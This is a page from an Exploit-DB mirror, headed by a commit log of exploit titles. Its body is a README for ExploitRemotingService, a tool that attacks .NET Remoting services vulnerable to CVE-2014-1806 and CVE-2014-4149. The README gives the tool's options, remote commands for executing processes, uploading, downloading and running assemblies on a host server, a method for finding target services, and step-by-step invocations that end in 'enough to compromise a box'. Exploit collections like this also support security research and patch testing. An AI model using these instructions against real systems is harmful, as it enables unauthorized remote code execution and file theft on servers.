bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/35280.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

78 lines
No EOL
3.5 KiB
Text
Raw Blame History

Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35280.zip
ExploitRemotingService (c) 2014 James Forshaw
=============================================
A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.
It only works on Windows although some aspects _might_ work in Mono on *nix.
Usage Instructions:
===================
ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014
Uri:
The supported URI are as follows:
tcp://host:port/ObjName - TCP connection on host and portname
ipc://channel/ObjName - Named pipe channel
Options:
-s, --secure Enable secure mode
-p, --port=VALUE Specify the local TCP port to listen on
-i, --ipc=VALUE Specify listening pipe name for IPC channel
--user=VALUE Specify username for secure mode
--pass=VALUE Specify password for secure mode
--ver=VALUE Specify version number for remote, 2 or 4
--usecom Use DCOM backchannel instead of .NET remoting
--remname=VALUE Specify the remote object name to register
-v, --verbose Enable verbose debug output
--useser Uses old serialization tricks, only works on
full type filter services
-h, -?, --help
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd cmdline : Execute a command line process and display stdou
t
put localfile remotefile : Upload a file to the hosting server
get remotefile localfile : Download a file from the hosting server
ls remotedir : List a remote directory
run file [args] : Upload and execute an assembly, calls entry point
user : Print the current username
ver : Print the OS version
This tool supports exploit both TCP remoting services and local IPC services. To test
the exploit you need to know the name of the .NET remoting service and the port it's
listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find
this in the server or client code. Look for things like calls to:
RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance
You can then try the exploit by constructing an appropriate URL. If TCP you can use the
URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.
A simple test is to do:
ExploitRemotingService SERVICEURL ver
If successful it should print the OS version of the hosting .NET remoting service. If
you get an exception it might be fixed with CVE-2014-1806. At this point try the COM
version using:
ExploitRemotingService -usecom SERVICEURL ver
This works best locally but can work remotely if you modify the COM configuration and
disable the firewall you should be able to get it to work. If that still doesn't work
then it might be an up to date server. Instead you can also try the full serialization
version using.
ExploitRemotingService -useser SERVICEURL ls c:\
For this to work the remoting service must be running with full typefilter mode enabled
(which is some, especially IPC services). It also only works with the commands ls, put
and get. But that should be enough to compromise a box.
I've provided an example service to test against.
Reference in a new issue View git blame Copy permalink